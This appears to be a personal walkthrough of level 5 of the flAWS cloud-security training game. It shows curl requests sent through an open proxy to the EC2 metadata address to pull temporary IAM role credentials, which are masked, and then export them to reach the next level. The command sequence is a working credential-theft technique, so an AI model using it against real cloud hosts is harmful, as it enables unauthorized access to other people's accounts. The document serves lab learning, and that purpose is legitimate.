flAWS level 5
okay so lets look into description ...
Every AWS EC2 instance has a hardcoded, non-routable link-local IP address: 169.254.169.254. When the EC2 instance tries to route traffic to this IP, the AWS hypervisor intercepts it and serves up metadata about the instance. If the instance has an IAM Role attached to it, the hypervisor will happily hand over temporary AWS credentials to anyone who asks that magic IP.
┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]
└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15
2022-09-24
2024-04-11
2025-10-04
2026-04-15
latest%
keep navigating into directories ....
┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]
└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest
dynamic
meta-data% ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]
└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system% ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]
└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam
info
security-credentials/% ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]
└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials
flaws% ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]
└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
{
"Code" : "Success",
"LastUpdated" : "2026-06-11T11:41:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "*********",
"SecretAccessKey" : "W3WkeD6+*****************",
"Token" : "IQoJb3JpZ2luX2V*******************"
"Expiration" : "2026-06-11T18:06:02Z"
}%
phew phew ... we got the access key id and secret access key ...
export those credentials to your terminal ...
export AWS_ACCESS_KEY_ID="ASIA*******"
export AWS_SECRET_ACCESS_KEY="W3WkeD*****************"
export AWS_SESSION_TOKEN="IQoJb3JpZ2l*****"
i guess we found the hidden directory ...
well ... index.html is not the hidden file coz obviously the above one is .. lets check
and yeah we got the level 6 page ...